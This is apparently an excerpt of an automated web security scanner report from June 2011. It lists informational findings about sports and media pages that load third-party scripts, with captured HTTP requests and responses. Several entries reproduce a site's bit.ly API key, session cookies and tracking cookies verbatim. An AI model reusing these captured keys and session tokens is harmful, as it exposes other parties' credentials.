Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "a4c243e66bc05d16d0003413f50079b9"
X-Runtime: 504
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 110573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=49572700"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...
<span style="float:right; margin-top:-1px;">

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</fb:send>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.84. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=4383123

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:43 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "4976aa6a1687ee1c27140bfb9454d5a0"
X-Runtime: 146
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 52503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=4383123"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.85. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=86789527

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:14:03 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "820fa21457f0d5549aec0bd131b34a77"
X-Runtime: 52
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 32409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=86789527"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.86. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=39132720

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:08 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "72f14425fb78555b91050e421b1eb475"
X-Runtime: 61
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 32399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=39132720"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.87. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=30680049

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:14:03 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "b0a6c97c4d0f7dc6f4240254d5c58df0"
X-Runtime: 45
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 32409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=30680049"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.88. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90;sz=728x90;ord=[timestamp]?
http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90;sz=200x90;ord=[timestamp]?
http://ad.doubleclick.net/adj/mavericks.dart/homepage_top_left_728x90;sz=728x90;ord=[timestamp]?
http://ad.doubleclick.net/adj/mavericks.dart/homepage_top_right_200x90;sz=200x90;ord=[timestamp]?
http://ad.doubleclick.net/adj/team_sites.dart/global_nav;sz=511x20;ord=1307964000?
http://i.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/s_code.js
http://js.revsci.net/gateway/gw.js?csid=A09801
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: JSESSIONID=2ECC4939FA4E7E07CA52A11436392FBB; Path=/
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Mon, 13 Jun 2011 11:20:00 GMT
Content-Length: 78608
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>THE OFFICIAL SITE OF THE DALLAS MAVERICKS</title>

   <
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=A09801">
</script>
...[SNIP]...
 <script language="JavaScript" src="http://ad.doubleclick.net/adj/mavericks.dart/homepage_top_left_728x90;sz=728x90;ord=[timestamp]?" type="text/javascript"> </script>
...[SNIP]...
 <script language="JavaScript" src="http://ad.doubleclick.net/adj/mavericks.dart/homepage_top_right_200x90;sz=200x90;ord=[timestamp]?" type="text/javascript"> </script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/team_sites.dart/global_nav;sz=511x20;ord=1307964000?" type="text/javascript">
</script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

        <script src="http://widgets.twimg.com/j/2/widget.js"> </script>
...[SNIP]...
 <script language="JavaScript" src="http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90;sz=728x90;ord=[timestamp]?" type="text/javascript"> </script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90;sz=200x90;ord=[timestamp]?" type="text/javascript"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://i.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/s_code.js"></script>
...[SNIP]...

19.89. http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/playoffs/2011_nba_finals_champions.html

Issue detail

The response dynamically includes the following script from another domain:

http://i.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/s_code.js

Request

GET /mavericks/playoffs/2011_nba_finals_champions.html HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=225
Date: Mon, 13 Jun 2011 11:01:20 GMT
Content-Length: 5775
Connection: close

<html><head>



<SCRIPT LANGUAGE="Javascript">


<script language="JavaScript" type="text/javascript" src="http://i.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/s_code.js"></script>
...[SNIP]...

19.90. http://www.nba.com/video/cvp/teamarticleplayer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/video/cvp/teamarticleplayer.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.cdn.turner.com/xslo/cvp/js/cvp/cvp_1.6.1.min.js
http://z.cdn.turner.com/nba/nba/.element/js/1.1/lib/prototype-1.6.0.3.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/cvp/article_nbaVideoPlayer.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/nbaTeams.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/nbaOmEvent.js
http://z.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js

Request

Response

19.91. http://www.stumbleupon.com/badge/embed/5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/badge/embed/5/

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.stumble-upon.com/js/badge_su.js?v=20110609

Request

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1145
Date: Mon, 13 Jun 2011 11:23:16 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110609" type="text/css" media="screen, projection" />

                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110609"></script>
...[SNIP]...

19.92. http://www.twackle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://apps.conduit-banners.com/Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3
http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/anywhere.js?id=E47U1Nno1pRL7ISrkdeqTA&v=1
http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js
http://yui.yahooapis.com/2.7.0/build/container/container-min.js
http://yui.yahooapis.com/2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET / HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=174083751.1307962974.1.1.utmcsr=sportdfw.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/06/13/10-observations-dallas-mavs-finals/; __utma=174083751.614070449.1307962974.1307962974.1307962974.1; __utmc=174083751; __utmb=174083751.7.10.1307962974

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:26:14 GMT
ETag: "699d03170f2d20d763ea57fb67b1a12f"
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 200
Vary: Accept-Encoding
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Runtime: 4
X-Varnish: 1493797375
Content-Length: 91066
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US" xmlns:fb="http:/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.7.0/build/menu/assets/skins/sam/menu.css">
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/menu/menu-min.js"></script>
...[SNIP]...
<link href="/stylesheets/style.css?1307717390" media="screen" rel="stylesheet" type="text/css" />
<script src="http://platform.twitter.com/anywhere.js?id=E47U1Nno1pRL7ISrkdeqTA&v=1" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
<span class="conduit_button">
<script type="text/javascript" src="http://apps.conduit-banners.com/Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee"></script>
...[SNIP]...

19.93. http://www.twackle.com/fansided/General_Twackle_Widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/fansided/General_Twackle_Widget

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /fansided/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 16
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:02:47 GMT
Last-Modified: Mon, 13 Jun 2011 10:54:41 GMT
Server: nginx/1.0.2
Vary: Accept-Encoding
Via: 1.1 varnish
X-Varnish: 1493695347 1493694269
Content-Length: 24854
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...

19.94. http://www.twackle.com/headlines previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/headlines

Issue detail

The response dynamically includes the following scripts from other domains:

http://apps.conduit-banners.com/Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3
http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/anywhere.js?id=E47U1Nno1pRL7ISrkdeqTA&v=1
http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js
http://yui.yahooapis.com/2.7.0/build/container/container-min.js
http://yui.yahooapis.com/2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /headlines HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://www.twackle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=174083751.1307962974.1.1.utmcsr=sportdfw.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/06/13/10-observations-dallas-mavs-finals/; __utma=174083751.614070449.1307962974.1307962974.1307962974.1; __utmc=174083751; __utmb=174083751.8.10.1307962974

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:26:34 GMT
ETag: "fd8e6fdfa931c887470aa403fbbc1b19"
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Set-Cookie: _twitter_session=BAh7CDoQX2NzcmZfdG9rZW4iMUJDdXhEZFpEZU54K1EwMjFtQ3A1SnZrQ0V5aWI0TkN5QjhPOUVtY1Fhb1k9IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9zZXNzaW9uX2lkIiU0NjRhNzY2MGVjNTRkODRmYjBiOTI4MmNlMDhjYWY0Yw%3D%3D--da22bb30207359f4a1189207e3f2c4b9ae4c54d5; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Runtime: 250
X-Varnish: 1493799163
Content-Length: 49264
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US" xmlns:fb="http:/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.7.0/build/menu/assets/skins/sam/menu.css">
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/menu/menu-min.js"></script>
...[SNIP]...
<link href="/stylesheets/style.css?1307717390" media="screen" rel="stylesheet" type="text/css" />
<script src="http://platform.twitter.com/anywhere.js?id=E47U1Nno1pRL7ISrkdeqTA&v=1" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
<span class="conduit_button">
<script type="text/javascript" src="http://apps.conduit-banners.com/Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">;
</script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=twackle&apiKey=R_335b9b7773efefaf2ecefdaa8b12eeee"></script>
...[SNIP]...

19.95. http://www.ugo.com/cm/ugo/js/ugo-global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ugo.com
Path:	/cm/ugo/js/ugo-global.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/ugo.ugo.games/games-index;dev=true;pt=free-games;channel=games;;sz=300x250;pos=top;tile=3;ord=1

Request

Response

19.96. http://www.ugo.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ugo.com
Path:	/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=240756231.1307963898.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=240756231.1048793645.1307963898.1307963898.1307963898.1; __utmc=240756231; __utmb=240756231.1.10.1307963898; UGOwelcome=welcomeMat:1; _vaTC=uuid=b7ddbc49-933b-4de0-9889-57b575dbf123&cId=SaUUUk&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1307963900099; _vaHC=holdout=false; cgi-session-id=D82D962E-95AE-11E0-8B8C-7B702AD2C302; __qca=P0-220341866-1307963918990; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; rsi_segs=I09839_10001|I09839_10075; s_vi=[CS]v1|26FAF90D0515BA6D-400001A7A019FB7D[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:20 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html
Content-Length: 312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>xd</title></head><body><script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

19.97. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://z-ecx.images-amazon.com
Path:	/images/G/01/pda/ifc._V195103274_.js

Issue detail

The response dynamically includes the following script from another domain:

http://bpx.a9.com/amzn/defaultad.js

Request

GET /images/G/01/pda/ifc._V195103274_.js HTTP/1.1
Host: z-ecx.images-amazon.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Server
Last-Modified: Sat, 06 Nov 2010 06:33:35 GMT
Content-Type: application/x-javascript
X-Cache-Lookup: HIT from cdn-images.amazon.com:8080
X-Cache-Lookup: MISS from cdn-images.amazon.com:10080
Vary: Accept-Encoding
Cache-Control: max-age=618152685
Date: Mon, 13 Jun 2011 11:19:11 GMT
Content-Length: 1720
Connection: close

var adserver_url;
function checkRequiredValues() {
   if(typeof base_url == "undefined" || typeof slot == "undefined"){
       punt();
   }

}

function createIframe(test) {
   var randomValue = '';
   if(test)
...[SNIP]...
"width", "100%");
   }

   // This can be the first child in the body as we assumed we are being
   // invoked in an iframe.
   document.body.insertBefore(iframe, null);
}

function punt() {
